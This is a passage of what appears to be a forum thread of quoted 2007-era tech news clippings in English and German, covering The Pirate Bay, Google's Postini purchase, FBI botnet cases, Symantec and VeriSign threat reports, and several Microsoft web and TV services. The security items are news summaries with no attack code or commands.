The public delights in the group's attitude toward anybody who sends it cease-and-desist letters, which are often published on the Web site along with Pirate Bay's cheeky replies. Some 157,000 movies, songs and other files can be found on the site, according to the MPAA, and 1.5 million people visit it a day, Mr. Neij says. The most popular movie on the site: Will Smith's "I Am Legend."

Rather than operate underground, The Pirate Bay's operators court publicity. Last year, they gained control of an Internet domain name used by the International Federation of Phonographic Industries, a music trade group that is essentially the international version of the Recording Industry Association of America. The site, www.ifpi.com, was redubbed the International Federation of Pirate Interests. The London-based IFPI got the domain name back last month.

The Pirate Bay's operators say they have been followed in recent weeks by camera-toting private detectives in foreign-registered cars. In September, they filed a police complaint claiming that MediaDefender, a U.S. counterpiracy company, had been hired by several Hollywood studios and music companies to hack into their site and shut it down.

MediaDefender, which itself was hacked by a shadowy group last year, denies the accusation. "We're a reputable public company," says Chief Executive Randy Saaf. "We're not going to be doing hacking. That's silly."

While the entertainment industry hopes a guilty verdict will deter other Swedes from file sharing, it acknowledges that making more entertainment available for legal download would help.

"New services are being explored," says Geraldine Moloney, a spokeswoman in Europe for the MPAA. "The industry is committed to offering film fans as much choice as possible."
[/QUOTE]

Source: http://online.wsj.com/

[QUTOE]
Google has announced the acquisition of communications security and compliance company Postini for $625million.

Postini offers a number of on-demand communications security and compliance solutions and serves more than 35,000 businesses and 10 million users worldwide. Postini’s services include message security, archiving, encryption, and policy enforcement tools which can be used to protect a company’s email, instant messaging, and other web-based communications platforms. Notably Google was already utilizing Postini technology with Gmail; the acquisition would appear to be a case of Google wanting to own a technology it was already using under license.

The acquisition of Postini comes as a surprise following rumors in June that the company was working towards an IPO.

Dave Girouard, Vice President & General Manager, Google Enterprise wrote on the Google Blog of the need for Google to deliver products that support complex business rules, information security mandates, and an array of legal and corporate compliance issues.

We realized that we needed a more complete way to address these information security and compliance issues in order to better support the enterprise community. That’s why we’re excited to share the news that we’ve agreed to acquire Postini, a company that offers security and corporate compliance solutions for email, IM, and other web-based communications. Like Google Apps, Postini’s services are entirely hosted, eliminating the need to install any hardware or software. A leader in its field, Postini serves more than 35,000 businesses and 10 million users, and was one of our first partners for Google Apps. Their email and IM management services include inbound and outbound policy management, spam and virus protection, content filtering, message archiving, encryption, and more. We will continue to support Postini’s customers and we look forward to the possibilities ahead.

The acquisition is expected to be finalized by the end of the third quarter 2007.
[/QUOTE]

Source: http://www.techcrunch.com/

[QUOTE]
We've officially acquired Postini
9/13/2007 03:07:00 PM
Posted by Dave Girouard, Vice President & General Manager, Google Enterprise

Source: http://googleblog.blogspot.com/

[QUOTE]

It’s the season for online shopping and spending, and you’ll be glad to know that we’ve stepped up our fight against one of the most serious cyber security threats just in time for the holidays.

That threat involves what are called ‘botnets’—armies of personal computers taken over by cyber criminals and used on the sly to commit all kinds of mischief, from identity theft to denial of service attacks to massive spam campaigns. Bah, humbug.

In June, we announced the first phase of Operation Bot Roast, which pinpointed more than a million victimized computers and charged a number of individuals around the country with various cyber-related crimes.

Today, we’re announcing part two of this operation, with more results:

• Three new indictments, including two this past month. In one case, we uncovered a denial of service attack on a major university in the Philadelphia area and then knocked out much of the botnet by disrupting its ability to talk to other computers.
• Two previously charged criminals who pled guilty, including a California man who is a well known member of the botnet underground.
• The sentencing of three others, including a pair of men who launched a major phishing scheme targeting a Midwest bank that led to millions of dollars in losses.

Our investigations spanned the country, including our field offices in Cincinnati, Detroit, Jacksonville, Los Angeles, Philadelphia, Sacramento, and Washington, D.C., which worked closely with a great many partners, including the Secret Service and Immigrations Customs Enforcement.

And these cases spanned the globe, involving information sharing and coordination with international colleagues like the New Zealand police. This week, authorities there conducted a search of the residence of the supposed ringleader of an elite global botnet coding group who goes by the cyber name of “AKILL.”

The collective toll revealed so far in our operation has been significant, both at a national level and a personal level. To date, we’ve uncovered more than $20 million in economic losses. In one case, a victim confirmed damages of nearly $20,000 in denial of service attacks via botnets.
[/QUOTE]

Source: http://www.fbi.gov/

By Andy Patrizio
September 17, 2007

Symantec today released its 12th bi-annual Internet Security Threat Report covering malicious activity over the first six months of the year, which confirms some trends that have been emerging and notes some new ones, as well.

The report covers activity from Jan. 1 to June 30 of this year, covering data gathered by Symantec's Global Intelligence Network. This consists of more than 40,000 sensors monitoring network activity in over 180 countries and sample code gathered by more than 120 million client, server, and gateway systems that have deployed Symantec’s antivirus products.

Also, Symantec runs what it calls the Probe Network, a system of over 2 million decoy accounts to attract e-mail messages from 20 different countries around the world, which allows Symantec to measure global spam and phishing activity.

What it found isn't pretty. Malicious activity is less computer vandalism and much more in the realm of criminality. Gone are the days when some punk's virus stomped on your FAT table and wrecked the hard drive. Symantec, along with many other antivirus vendors, thinks viruses as we know them are in decline, replaced with crimeware.

"Viruses are dropping in favor of theft," Zulfikar Ramzan, senior principal researcher in Advanced Threat Research at Symantec, told InternetNews.com. "Of the top 20 samples we received, 65 percent could threaten confidential info, and 88 percent of those were keystroke loggers. Goes to show hackers are much more after the financial benefits of their activities as opposed to the notoriety of it."

Making things worse is the commercialization of malware thanks to development kits that allow anyone to make a Trojan or worm. The most notorious is MPACK, written by a Russian crimeware gang, that Ramzan said goes for around $1,000. MPACK comes with sample code, making it easy to jumpstart the task.

"[Malware is] getting worse because developers aren't starting from scratch; they're taking existing work and making it worse," he said. In addition, Symantec found that 42 percent of phishing attacks were from 3 specific kits, none of which have a name.

In general, Ramzan said phishing operations can be completely outsourced and require no technical skills. All one needs is a kit to develop a phishing attack relatively easily, rent time on spam and phishing servers, buy a list of e-mail addresses from the underground economy, and go trolling.

Once you have a bunch of credit cards, bank accounts or identities, you can then turn around and sell them on underground servers. Ramzan found credit cards selling for 50 cents to $5, depending on the limit, bank accounts selling for $30 to $400 and identities selling for $6 to $100.

A lot of the crooks involved in this business actually treat it like a job. "We notice more activity on weekdays then weekends. There's a supply chain from the underground, commoditization of the tools, support contracts for the toolkits. There's an incredible amount of professionalization that's gone into this world," he said.

Overwhelmingly, the targets of attacks are home users. Symantec estimates 95 of all attacks in the last six months have been aimed at the home user, an increase from the 87 percent last year.

And those attacks are not aimed at vulnerabilities. Even though Symantec found all of the operating system vendors have improved their response times to when a vulnerability pops up, with the exception of HP, that's not where the criminals are going. Symantec found that exploits of vulnerabilities only made up 18 percent of attacks. The rest were simply looking for a sucker to click on the wrong link or run a file they shouldn't.

One of the new areas of exploitation is browser plug-ins. Symantec saw an explosion from 74 to 237 over the course of one period between reports. Ramzan said the plug-ins are becoming targets because the browsers are being hardened. The only browser under attack is Apple's Safari, which went from four in the last report period to 25 in this most recent one, a testament to Apple's growing popularity.

Rootkits, those devils that seemed to scare the daylights out of everyone, seem to have fallen off the radar. The one exception was the Storm Trojan because it used a rootkit to hide itself. Trojans remain the most common form of attack, which require a gullible end user, not an exploit

[QUOTE]
Denial-of-service attacks are growing faster than bandwidth is being added to the internet, according to VeriSign, the company that administers the .com domain.

Criminal groups selling services online are increasingly threatening the fabric of the internet, as the size of the compromised networks of computers they control increases, according to VeriSign.

The company claimed that a successful denial-of-service (DoS) attack against VeriSign could bring down the internet. "There are attacks attempting to shut down our servers," said Ken Silva, VeriSign's chief security officer. "This would effectively shut down the internet."

Silva said that although DoS attacks are difficult to trace, there are "a couple of well-known groups in Russia, China and Romania" that may be acting with their government's knowledge. "It would be hard to imagine groups who have this much activity going unnoticed by their governments," he said.

The chief security officer said that VeriSign "hoped to get smarter" in blocking malicious traffic. "We can continue to add bandwidth, but ultimately 20 years down the road, this can't continue as a footrace. The internet as a whole has to get smarter in denying DoS attacks."

"Our monitoring systems now resemble those for the space shuttle," said Silva. "We monitor the capability of our CPUs and memory allocation on all of our servers. We're predicting what problems will occur rather than waiting for them to occur."

Many public-sector organisations in the UK suffer from DoS attacks. The Probation Service has upgraded its servers in the past week to cope with the traffic created by botnets, according to a security manager for the Probation Service.

"We've had to upgrade our hardware in the last week to cope with an unexpected increase in the volume of malicious traffic at the network gateway," the security manager told ZDNet.co.uk. "Simply coping with that is compromising our ability to run our business. The problem is simply coping with what is coming at us."

Tim Pickett, a former technical security analyst at AOL, said that ISPs should monitor their networks to mitigate DoS attacks. "ISPs should be monitoring what's going through their networks," said Pickett. "More should be done to tackle the problem on the ISP side."

[/QUOTE]

Source: http://news.zdnet.co.uk

Image spam is old news. The spammers use botnets to send uniquely modified images in each spam e-mail. The images have to be unique – otherwise spam filters could just simply drop known spam images.

So far, the images have typically been modified by adding colors, changing fonts, and inserting random dots and lines.
Results have typically looked like this (URLs smudged to prevent accidental business benefits for the spammers):

Over the last few days, we're seeing more image spam that is rendering the spam text with a pseudo 3D layout:

Generating images like this is of course more computing intensive… but hey, spammers have lots of computing power at their disposal via the huge botnets they're running. It's not like they couldn't afford to render unique 3D spam for every recipient.

More on: http://www.f-secure.com/weblog/#00001267

At Microsoft's Worldwide Partner Conference, CEO Steve Ballmer gave a few more details about the company's move toward hosting services.

[QUOTE]
Microsoft's top executive outlined the company's plan to transition from a traditional software company to offering software plus services for the first time on Tuesday, giving some roadmap details for how the strategy will play out in the next year.

In a keynote at the Worldwide Partner Conference in Denver, Microsoft CEO Steve Ballmer shed more details on the plan other executives, such as Chief Software Architect Ray Ozzie, have been teasing out over the past year -- but not many more. He gave a time frame for the early part of the transition but mostly echoed what other executives have said about Microsoft's slow transition to adding hosted business services to its traditional software portfolio.

"For software plus services, the time is now," Ballmer said, finishing off the first of a raft of keynotes on the first day of Microsoft's annual partner conference. He said that over the next year, Microsoft will continue to sell mostly on-premises software, but there will be more evidence of the transition to its hybrid model as the year goes on.

Since Microsoft began talking about its plan to gradually transition to offering more hosted services last year in a speech by Ozzie at its TechEd Conference in Boston, many noted that the company had no choice. With such an entrenched business in enterprise and consumer desktop software, it would be impossible for Microsoft to be as nimble in offering hosted services as rivals like Google and Salesforce.com, which started their businesses as Web-based services providers. And a warmer reception for hosted services is clearly the direction the enterprise market is heading as businesses become more comfortable accessing Web-based services beyond the traditional consumer staples of e-mail and search that have been popular for years.

The transition to providing more services will touch every part of Microsoft's business, but some changes will be more obvious than others, Ballmer said. The user interface will be an important place for innovation in this area, and Microsoft's Silverlight technology is the cornerstone of that, he said. Microsoft introduced Silverlight, a browser plug-in that allows for rich video and interactive media experience to be delivered within Web sites, in April.

A solid services platform on which partners can build services and also that they can resell with Microsoft managing and hosting them also will be a clear sign of the transition, Ballmer said. Microsoft already is offering a combination of consumer-oriented services, such as Windows Live Hotmail and Windows Live Local Search, but will begin bulking up its portfolio of enterprise services as well, he said.

Microsoft already has unveiled business services like Exchange Hosted Services for enterprise messaging and Office Live hosted service for small businesses. There will be new and expanded services like these as Microsoft progresses further with its software plus services strategy, Ballmer said.
[/QUOTE]

Found on: www.infoworld.com

The World Wide Web Consortium (W3C) ( http://newsletter.infoworld.com/t?ctl=180648E:B6DDBA76EF261945A84BC0BE80271078EFF29049075316B4 ) is announcing Wednesday that it has completed work on the WSDL 2.0 Web services standard, which expands HTTP and SOAP support for Web applications.

More: http://newsletter.infoworld.com/t?ctl=180647F:B6DDBA76EF261945A84BC0BE80271078EFF29049075316B4

[QUOTE]
BERKELEY, California -- Two technologies demonstrated at the International Virtual Reality Photography Conference over the weekend come close to delivering the amazing imaging technologies used in Blade Runner to zoom deep into pictures and explore them from different angles.

Both developed by Microsoft, one application allows viewers to zoom deep into gigantic, gigapixel panoramic images. A sweeping view of downtown Seattle and the Puget Sound can be enlarged to show diners sitting in the Space Needle. Another application constructs 3-D objects from hundreds of ordinary 2-D photographs, allowing the object to be explored from any angle.

The most impressive demonstration at Sunday’s IVRPC seminar was Photosynth from Microsoft Live Labs -- a program that constructs large-scale, 3-D models of objects like buildings from hundreds of still photographs.

Using a mouse, viewers can walk in -- and around -- the 3-D model, looking at the object from almost any angle. Viewers can isolate individual shots, and quickly zoom into the tiniest details with a roll of the mouse scroll wheel. (Online demos available here require Windows XP SP2 or Vista).

One reconstructed scene showed the Trevi fountain in Rome, stitched together from 350 photographs scraped from Flickr. The immersive scene incorporated images shot with everything from cell-phone cameras to high-end SLRs.

Another 3-D panorama reconstructed the lavish Gyeongbokgung palace in Seoul, Korea, integrating both professional shots and photographs submitted by amateurs.

“You can actually jump into the images,” remarked Drew Steedly, a scientist with Microsoft Live Labs.

Photosynth uses a visual algorithm to scan through hundreds of images, hunting for distinctive features. After identifying features common to different pictures -- doors, windows and sculptures -- the program links the photos together and calculates the 3-D position of each picture.

The technique is similar to depth perception -- where the brain combines different views from each eye into one seamless 3-D view. In Photosynth, the system establishes a "point-cloud" for each photograph space, and then stitches the latticework of images to create a dazzlingly seamless three-dimensional interactive environment ready for exploration.

"We’re working on releasing something where you could make your own collection,” said Steedly, although when pressed, he admitted there's no timetable for the public rollout of Photosynth.

Matt Uyttendaele of Microsoft Research showed off HD View, a high-definition panoramic viewer that can handle monster panoramic shots, often several gigapixels big.

The browser-based viewer provides an immersive wide-angle view, up to 360 degrees, and is capable of displaying images composed of billions of pixels. (Again, the technology requires XP or Vista).

The sweeping panorama of Seattle was composed of 800 images taken with a zoom camera mounted on a motorized telescope tripod. The tripod stepped the camera across the panorama as it captured a mosaic of 20 megapixel images.

"Its pretty amazing, details in the JPEG images that you don’t even realize are there," said Uyttendaele. "It’s just another dimension to exploring these really large images."

Currently available only for Windows, a new version of HD View will be released in a few weeks that adds tone mapping, which sharpens images by automatically removing atmospheric haze.

“We’re encouraging people to try this out if they want,” said Uyttendaele.
[/QUOTE]

Source: http://www.wired.com

[QUOTE]
Apple is becoming a favorite target of security researchers these days. In April, there was the $10,000 CanSecWest hack a Mac contest, and on Monday, there was the Safari Web browser. Or the public beta of Safari for Windows, anyway.

Just hours after Apple released its first Windows beta of Safari, researcher Aviv Raff said he'd found a bug.

In an interview, Raff said that it took about three minutes of fuzzing to find the bug and that he hadn't tested the issue on Mac OS X. So he couldn't say whether or not it affected Safari on Windows only. The bug causes the browser to crash and "might be exploitable," according to Raff, meaning it could possibly be used to run malware on the PC.

Raff was clearly unhappy with Apple's claim that Safari was designed to be "secure from day one" (he called this claim "pathetic"), but he said he wasn't particularly going after Apple. "I don't pick just on Apple," he said. "I've posted about Microsoft and Mozilla issues too."

"Everyone has bugs, but not everyone says that they are 'designed to be secured from day one,'" he added. "I guess it's day zero now."
[/QUOTE]

Source: www.infoworld.com

Microsoft officially launched Popfly as a private alpha.

What the heck is it?

[QUOTE]
Popfly is the fun, easy way for anyone to build and share mashups, gadgets, Web pages, and applications. Popfly consists of two parts:

1. Popfly Creator is a set of online visual tools for building Web pages and mashups.

2. Popfly Space is an online community of creators where you can host, share, rate, comment and even remix creations from other Popfly users.

See the video here for how to easily use online services like Flickr, Digg, and even World of Warcraft without writing code.
[/QUOTE]

Source: blogs.msdn.com/danielfe

[QUOTE]
One beta ends and suddenly five more spring up in its place. We can finally get the talk around Windows Live going again - the Windows Live Folders site has just opened up in preparation for the beta. (Please note the beta has not yet started, so the site will not work correctly.)

So how does it work? Windows Live Folders allows you to upload your files to the cloud, providing access to them from an internet browser (both IE and Firefox are supported). The key part is using Windows Live ID to limit access to the files you have uploaded, allowing you to keep them private, share them with contacts, or make them public. With Windows Live, it's the sum of the parts that gives it so much potential. Here's a summary of the Folders service:

Personal

• Use personal folders to back up important files that are only for you.
• Get to your files from any computer with Internet access by signing in with your Windows Live ID.

Shared

• Shared folders make it easy to collaborate with coworkers or classmates.
• You decide how much control each person has over each shared folder. Some can just read what's there: others can add and delete files.
• Everyone who is sharing uses their own Windows Live ID.

Public

• With public folders, anyone on the Internet can view your files, but they can't change them.
• Want to show your public files to others? Just send them a link! Each folder and file has its own web address.

The beta service looks to only be offering 500MB initially, with a maximum file size of ~50MB but as we've seen with the just-launched Windows Live Hotmail, internet services need to be scaled up carefully. There's no Windows Live Folders client available for download either, undoubtably a key part of the "Live Drive" package, but lets not get too disappointed yet. The beta we've all been waiting for is almost here.

A brief review and screenshots is available separately as this post got too long.

Windows Live Folders homepage

[/QUOTE]

Update: The site has been taken down for now. Subscribe to RSS feed to find out when the beta starts for good.

Source: liveside.net/blogs/

The french website ecrans.fr describes a trick on how you can get a deeper zoom in Google-Maps.

Go to http://maps.google.de/ and:

1. search for your preferred location
2. zoom in (maximum)
3. click on the button "URL for this page" (right upper corner)
4. search in the URL for "UTF8&z=19" and replace the number 19 with 23 or even 24 (but it works mostly only with numbers < 21 and the resolution is not everywhere the same!!) 

This example (Tchad) shows an impressive zoom.

Source: http://www.ecrans.fr/spip.php?article907

Wegen der Schnelligkeit und Genauigkeit der Suchmaschinen braucht es keine leicht erkennbaren Webadressen mehr. IT-Week-Redakteur David Neal elaboriert über die Zwecklosigkeit der Namenssuche.

>>> hier geht's zur Studie: http://www.it-im-unternehmen.de/strategie/article20070222017.aspx

[QUOTE]
Microsoft will showcase the Xbox 360's IPTV service for the first time in Europe at The Connected Home Show at London's Olympia next month.
Ed Graczyk, Worldwide Director of Marketing and Communications for Microsoft TV will demonstrate the service during his keynote at the conference, specifically showcasing what happens when "next-generation television is combined with next-generation gaming in a unique, new service delivered by your broadband provider".

IPTV is expected to be available as early as Christmas 2007 in Europe, and telecom providers BT, Deutsche Telekom and T-Online in France have already chosen Microsoft IPTV Edition as their IPTV software choice.
[/QUOTE]

More at computerandvideogames.com.

[QUOTE]
Microsoft Corp. (NASDAQ:MSFT) chairman Bill Gates unveiled a slew of new products and content partners Sunday in his keynote address kicking off the 2007 International Consumer Electronics Show, vowing to deliver access to video and data no matter where the consumer might be.

"It's a dream if you're a sports fan or there's a sports fan in your house," said Robbie Bach, president of Microsoft's entertainment and devices division and the company's chief liaison to Hollywood. Bach and Gates alternated introducing new products during Microsoft's CES presentation.

In addition, Microsoft said that it has signed Lionsgate (NYSE:LGF) to its roster of programming contributors to Xbox 360 Live Marketplace, joining Paramount and Warner Bros. Bach hailed the addition of a library of video content to Xbox Live that either can be streamed or downloaded, noting that 100 million downloads of games, TV episodes and movies have been generated over the past 13 months; he did not offer a separate account of how video alone has fared since Microsoft signed content partners including ABC, Comedy Central and the CW as of Nov. 22. Xbox 360 also will provide an IPTV service that can deliver video programming, essentially functioning as a set-top box.

Although that doesn't put Microsoft in the video distribution business, it opens up the possibility that the company could partner with AT&T (NYSE:SBT) (NYSE:T) to offer a mix of voice, video, data and wireless. Microsoft already provides software for AT&T's IP-based rollout, raising the specter that the telco's current U.S. service, U-Verse, could eventually be bundled with Xbox 360.

IPTV video has DVR and video-on-demand functionality and also will enable seamless switching between video programming and games, and even blur the two, demonstrating functionality that allowed a community of users to talk to their Xbox even while its in TV mode.
[/QUOTE]

Full Story: money.cnn.com

Microsoft unleashed its Soapbox Web video platform (its YouTube competitor) to the unwashed masses yesterday, taking the service out of private beta. The service has a clean and simple layout, and manages to keep both the MSN moniker and the often-clunky Windows Live Login (formerly .NET Passport). What baffles me about this is that despite having access to all your personal information, Soapbox won't parse your Windows Live ID to fill in simple profile information like your name and location, unless you've recently gone through and updated it since opening a Hotmail account in the 90s. Nor will it go through your Windows Live e-mail to see if you want to share any videos that have been sent to you by friends. If Microsoft is aiming for no-nonsense integration with its Web services, it's sadly not there yet.

That being said, Microsoft did add the ability to post videos in your blog, which was one of the original Soapbox criticisms. The catch is that it has to be a Windows Live Spaces blog. Alternatively, there are the standard permalinks and embed codes for you to send to friends or put on your blog or Web site.

Below I've embedded one of my favorite videos. Note the fact you can access both share codes and description from the player itself. Neat.

Video: Amazingly Cool Ad

Luftbildaufnahmen mit hohem Detailgrad für fünf Dutzend Städte

Der Kartendienst "Virtual Earth" von Microsoft hat mit dem Werkzeug "Bird’s Eye View" eine deutliche Verbesserung erfahren. Aus der Vogelperspektive können rund fünf Dutzend deutscher Städte von oben betrachtet werden. Anstelle von Satellitenaufnahmen, wie sie vom Konkurrenten Google Earth verwendet werden, kommen bei der Bird's Eye View von Virtual Earth Luftbildaufnahmen zum Einsatz.

Die folgende Städte lassen sich aus der Vogelperspektive überfliegen:
Aalen, Aschaffenburg, Augsburg, Baden-Baden, Bamberg, Bayreuth, Binz, Brandenburg, Chemnitz, Cottbus, Dessau, Dresden, Erfurt, Erlangen, Freiburg im Breisgau, Gera, Göppingen, Görlitz, Halle, Hanau, Heilbronn, Ingolstadt, Jena, Karlsruhe, Kempten (Allgäu), Konstanz, Landshut, Leipzig, Lübeck, Ludwigsburg, Magdeburg, Mannheim, München, Neumünster, Nürnberg und Fürth, Offenburg, Pforzheim, Plauen, Potsdam, Reutlingen, Rosenheim, Rostock, Saarbrücken, Sassnitz, Schwäbisch Gmünd, Sindelfingen, Speyer, Stralsund, Stuttgart, Trier, Tübingen, Ulm, Villingen-Schwenningen, Waiblingen, Weimar, Wolfsburg und Würzburg.

Die Aufnahmen wurden im Sommer 2006 gemacht. Die ausgewählten Standorte lassen sich per direkte URL weitergeben. Der Kartendienst ist online unter maps.live.com zu finden.

Mehr Info's: http://www.golem.de/0702/50579.html

The World Wide Web Consortium (W3C) this week announced it has published eight standards in its XML family to support the ability to query and transform XML data and documents.

Primary specifications include XQuery 1.0: An XML query language; Extensible Stylesheet Language Transformations (XSLT) 2.0 and XML Path Language (XPath) 2.0.

The new standards will play a role in enterprise computing by connecting databases with the Web, W3C said. XQuery provides for data mining while XSLT 2.0 boosts functionality in XSLT, which enables transformation and styled presentation of XML documents. These two specifications are dependent on XPath 2.0.

XPath 2.0 is an expression language allowing processing of values conformining to the data model defined in XQuery/XPath Data Model (XDM). The model provides a tree representation of XML documents and atomic values such as integers and strings. Version 2.0 supports a richer set of data types than the 1.0 version.

"XQuery will serve as a unifying interface for access to XML data, much as SQL has done for relational data," said Don Chamberlin of IBM Almaden Research Center, co-inventor of the original SQL query language and a co-editor of XQuery 1.0, in a statement released by W3C.

In addition to the primary specifications published this week, others include:

* XML Syntax for XQuery 1.0 (XQueryX).
* XDM.
* XQuery 1.0 and XPath 2.0 Functions and Operators.
* XQuery 1.0 and XPath 2.0 Formal Semantics.
* XSLT 2.0 and XQuery 1.0 Serialization.

[QUOTE]
RESTON, Va., January 15, 2006 – comScore Networks today released its monthly qSearch analysis of activity across competitive search engines. In December 2006, Google Sites captured 47.3 percent of the U.S. search market, gaining 0.4 share points from the previous month. Yahoo! Sites grew 0.3 share points, maintaining its second place ranking with 28.5 percent of U.S. searches, followed by Microsoft Sites (10.5 percent), Ask Network (5.4 percent) and Time Warner Network (4.9 percent).

• Americans conducted 6.7 billion searches online in December, up 1 percent versus November. Annual growth rates in search query volume remained strong with a 30-percent increase since the same month a year ago.

• Google Sites led the pack with 3.2 billion search queries performed, followed by Yahoo Sites (1.9 billion), MSN-Microsoft (713 million), Ask Network (363 million), and Time Warner Network (335 million).
[/QUOTE]

Blogger Robert Basic ist der Frage nachgegangen, wie viel Geld mit Blogs direkt verdient wird und wie sich diese Einnahmen zusammensetzen. Daten von 47 Blogs wurde zur Verfügung gestellt, die Ergebnisse nun in einer Zusammenfassung veröffentlicht. Im Schnitt kommen die Blogger auf 213,- US-Dollar pro Monat.

Das Ergebnis veröffentlichte Basic nun in seinem Blog.